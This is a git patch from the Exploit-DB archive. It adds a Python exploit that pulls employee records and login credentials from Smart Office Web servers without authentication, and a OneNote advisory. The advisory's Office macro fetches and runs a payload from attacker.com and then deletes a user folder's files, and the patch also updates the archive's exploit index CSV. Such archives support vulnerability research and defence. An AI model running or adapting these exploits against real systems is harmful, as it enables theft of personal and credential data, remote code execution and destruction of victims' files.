From ea194c414ff4a378ce1d1a826b6e54fa9cc4ddfe Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Fri, 23 Jun 2023 00:16:26 +0000 Subject: [PATCH] DB: 2023-06-23 3 changes to exploits/shellcodes/ghdb Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated) Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution Super Socializer 7.13.52 - Reflected XSS --- exploits/aspx/webapps/51539.py | 63 ++++++++++++++++++++++++++++++ exploits/multiple/remote/51538.txt | 45 +++++++++++++++++++++ files_exploits.csv | 6 ++- 3 files changed, 112 insertions(+), 2 deletions(-) create mode 100755 exploits/aspx/webapps/51539.py create mode 100644 exploits/multiple/remote/51538.txt diff --git a/exploits/aspx/webapps/51539.py b/exploits/aspx/webapps/51539.py new file mode 100755 index 000000000..b07dcbf97 --- /dev/null +++ b/exploits/aspx/webapps/51539.py @@ -0,0 +1,63 @@ +# Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated) +# Shodan Dork:: inurl:"https://www.shodan.io/search?query=smart+office" +# Date: 09/Dec/2022 +# Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/) +# Vendor Homepage: https://smartofficepayroll.com/ +# Software Link: https://smartofficepayroll.com/downloads +# Version: Smart Office Web 20.28 and before +# CVE Number : CVE-2022-47075 and CVE-2022-47076 +# CVSS : 7.5 (High) +# Reference : https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-cve-2022-47075/ +# Vulnerability Description: +# Smart Office Web 20.28 and before allows Remote Information Disclosure(Unauthenticated) via insecure direct object reference (IDOR). This was fixed in latter version except for ExportEmployeeDetails. + +import wget +import os +from colorama import Fore, Style + +def download_file(url, filename): + wget.download(url, filename) + +# Disclaimer +print(Fore.YELLOW + "Disclaimer: This script is for educational purposes only.") +print("The author takes no responsibility for any unauthorized usage.") +print("Please use this script responsibly and adhere to the legal and ethical guidelines.") + +agree = input("Do you agree to the disclaimer? (1 = Yes, 0 = No): ") +if agree != "1": + print("You have chosen not to agree. Exiting the script.") + exit() + +# Print name in red +name = "Exploit by Tejas Nitin Pingulkar" +print(Fore.RED + name) +print(Style.RESET_ALL) # Reset color + +website = input("Enter URL [https://1.1.1.1:1111 or http://1.1.1.1]: ") +target_version = input("Is the target software version 20.28 or later? (1 = Yes, 0 = No): ") +folder_name = input("Enter the folder name to save the files: ") + +# Create the folder if it doesn't exist +if not os.path.exists(folder_name): + os.makedirs(folder_name) + +urls_filenames = [] + +if target_version == "1": + urls_filenames.append((website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails", "ExportEmployeeOtherDetails.csv")) +else: + urls_filenames.extend([ + (website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails", "ExportEmployeeDetails.csv"), + (website + "/DisplayParallelLogData.aspx", "DisplayParallelLogData.txt"), + (website + "/ExportReportingManager.aspx", "ExportReportingManager.csv"), + (website + "/ExportEmployeeLoginDetails.aspx", "ExportEmployeeLoginDetails.csv") + ]) + +print("CVE-2022-47076: Obtain user ID and password from downloaded source") + +for url, filename in urls_filenames: + download_file(url, os.path.join(folder_name, filename)) + +# Print "for more such interesting exploits, visit cvewalkthrough.com" in red +print(Fore.RED + "\nFor more such interesting exploits, visit cvewalkthrough.com") +print(Style.RESET_ALL) # Reset color \ No newline at end of file diff --git a/exploits/multiple/remote/51538.txt b/exploits/multiple/remote/51538.txt new file mode 100644 index 000000000..0e7cce55b --- /dev/null +++ b/exploits/multiple/remote/51538.txt @@ -0,0 +1,45 @@ +## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing +## Author: nu11secur1ty +## Date: 06.22.2023 +## Vendor: https://www.microsoft.com/ +## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app +## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected + +## Description: +Microsoft OneNote is vulnerable to spoofing attacks. The malicious +user can trick the victim into clicking on a very maliciously crafted +URL or download some other malicious file and execute it. When this +happens the game will be over for the victim and his computer will be +compromised. +Exploiting the vulnerability requires that a user open a specially +crafted file with an affected version of Microsoft OneNote and then +click on a specially crafted URL to be compromised by the attacker. + +STATUS: HIGH Vulnerability + +[+]Exploit: +```vbs +Sub AutoOpen() + Call Shell("cmd.exe /S /c" & "curl -s +https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass", +vbNormalFocus) +End Sub + +``` +[+]Inside-exploit +``` +@echo off +del /s /q C:%HOMEPATH%\IMPORTANT\* +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140) + +## Proof and Exploit: +[href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html) + +## Time spend: +01:15:00 + + +-- \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 5da1d43da..502e6a9f2 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -1847,6 +1847,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41618,exploits/aspx/webapps/41618.txt,"Sitecore CMS 8.1 Update-3 - Cross-Site Scripting",2017-03-15,"Pralhad Chaskar",webapps,aspx,,2017-03-15,2017-03-15,0,CVE-2016-8855,,,,, 45973,exploits/aspx/webapps/45973.txt,"Sitecore CMS 8.2 - Cross-Site Scripting / Arbitrary File Disclosure",2017-05-05,"Usman Saeed",webapps,aspx,,2018-12-11,2018-12-11,0,,,,,, 45152,exploits/aspx/webapps/45152.txt,"Sitecore.Net 8.1 - Directory Traversal",2018-08-06,Chris,webapps,aspx,,2018-08-06,2018-08-09,0,CVE-2018-7669,,,,, +51539,exploits/aspx/webapps/51539.py,"Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)",2023-06-22,"Tejas Pingulkar",webapps,aspx,,2023-06-22,2023-06-22,0,CVE-2022-47076;CVE-2022-47075,,,,, 42923,exploits/aspx/webapps/42923.txt,"SmarterStats 11.3.6347 - Cross-Site Scripting",2017-09-27,sqlhacker,webapps,aspx,,2017-10-01,2017-10-01,0,CVE-2017-14620,,,,, 50328,exploits/aspx/webapps/50328.txt,"SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure",2021-09-24,"Andrei Manole",webapps,aspx,,2021-09-24,2021-09-24,0,,,,,, 47793,exploits/aspx/webapps/47793.txt,"Telerik UI - Remote Code Execution via Insecure Deserialization",2019-12-18,"Bishop Fox",webapps,aspx,,2019-12-18,2019-12-18,0,CVE-2019-18935,Deserialization,,,,https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui @@ -11024,6 +11025,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 19686,exploits/multiple/remote/19686.txt,"Microsoft Internet Explorer 4/5/5.5/5.0.1 - external.NavigateAndFind() Cross-Frame",1999-12-22,"Georgi Guninski",remote,multiple,,1999-12-22,2012-07-08,1,CVE-2000-0028;OSVDB-7903,,,,,https://www.securityfocus.com/bid/887/info 19492,exploits/multiple/remote/19492.txt,"Microsoft Internet Explorer 5 / Netscape Communicator 4.0/4.5/4.6 - JavaScript STYLE",1999-09-13,"Georgi Guninski",remote,multiple,,1999-09-13,2012-06-30,1,CVE-1999-0750,,,,,https://www.securityfocus.com/bid/630/info 24189,exploits/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,remote,multiple,,2004-06-10,2013-01-17,1,,,,,,https://www.securityfocus.com/bid/10517/info +51538,exploits/multiple/remote/51538.txt,"Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing",2023-06-22,nu11secur1ty,remote,multiple,,2023-06-22,2023-06-22,0,,,,,, 19451,exploits/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP",1999-08-11,L0pth,remote,multiple,,1999-08-11,2012-06-28,1,CVE-1999-0875;OSVDB-1039,,,,,https://www.securityfocus.com/bid/578/info 51376,exploits/multiple/remote/51376.txt,"Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)",2023-04-20,nu11secur1ty,remote,multiple,,2023-04-20,2023-04-20,0,CVE-2023-28311,,,,, 20425,exploits/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",remote,multiple,,2000-11-22,2012-08-11,1,CVE-2000-1173;OSVDB-11344,,,,,https://www.securityfocus.com/bid/1977/info @@ -23438,7 +23440,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34788,exploits/php/webapps/34788.txt,"MODx manager - '/controllers/default/resource/tvs.php?class_key' Traversal Local File Inclusion",2010-09-29,"John Leitch",webapps,php,,2010-09-29,2014-09-26,1,CVE-2010-5278;OSVDB-68265,,,,,https://www.securityfocus.com/bid/43577/info 45055,exploits/php/webapps/45055.py,"Modx Revolution < 2.6.4 - Remote Code Execution",2018-07-18,"Vitalii Rudnykh",webapps,php,,2018-07-18,2018-07-18,0,,,,,, 15701,exploits/php/webapps/15701.txt,"MODx REvolution CMS 2.0.4-pl2 - POST injection Cross-Site Scripting",2010-12-06,LiquidWorm,webapps,php,,2010-12-06,2010-12-06,0,OSVDB-69643,,,,,http://bugs.modx.com/issues/2918 -51059,exploits/php/webapps/51059.txt,"MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-26149,,,,, +51059,exploits/php/webapps/51059.txt,"MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-06-22,1,CVE-2022-26149,,,,, 4739,exploits/php/webapps/4739.pl,"MOG-WebShop - 'index.php?group' SQL Injection",2007-12-18,k1tk4t,webapps,php,,2007-12-17,,1,OSVDB-40272;CVE-2007-6466,,,,, 25304,exploits/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,webapps,php,,2013-05-08,2013-06-24,1,OSVDB-93234;CVE-2012-6495;OSVDB-88825;CVE-2012-6081,,,,http://www.exploit-db.commoin-1.9.5.tar.gz, 29915,exploits/php/webapps/29915.txt,"MoinMoin 1.5.x - 'index.php' Cross-Site Scripting",2007-04-26,"En Douli",webapps,php,,2007-04-26,2013-11-30,1,CVE-2007-2423;OSVDB-36567,,,,,https://www.securityfocus.com/bid/23676/info @@ -30180,7 +30182,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 9270,exploits/php/webapps/9270.txt,"Super Mod System 3.0 - 's' SQL Injection",2009-07-27,MizoZ,webapps,php,,2009-07-26,,1,OSVDB-56562;CVE-2009-3224,,,,, 9180,exploits/php/webapps/9180.txt,"Super Simple Blog Script 2.5.4 - 'entry' SQL Injection",2009-07-17,JIKO,webapps,php,,2009-07-16,,1,OSVDB-55952;CVE-2009-2553,,,,, 9179,exploits/php/webapps/9179.txt,"Super Simple Blog Script 2.5.4 - Local File Inclusion",2009-07-17,JIKO,webapps,php,,2009-07-16,,1,OSVDB-55953;CVE-2009-2552,,,,, -51534,exploits/php/webapps/51534.py,"Super Socializer 7.13.52 - Reflected XSS",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-2779,,,,, +51534,exploits/php/webapps/51534.py,"Super Socializer 7.13.52 - Reflected XSS",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-22,1,CVE-2023-2779,,,,, 8874,exploits/php/webapps/8874.txt,"SuperCali PHP Event Calendar - Arbitrary Change Admin Password",2009-06-04,TiGeR-Dz,webapps,php,,2009-06-03,,1,,,,,, 4141,exploits/php/webapps/4141.txt,"SuperCali PHP Event Calendar 0.4.0 - SQL Injection",2007-07-03,t0pP8uZz,webapps,php,,2007-07-02,2016-10-05,1,OSVDB-36300;CVE-2007-3582,,,,http://www.exploit-db.comsupercali-0.4.0.zip, 44639,exploits/php/webapps/44639.txt,"SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass",2018-05-17,L0RD,webapps,php,,2018-05-17,2018-06-15,0,,"Cross-Site Scripting (XSS)",,,,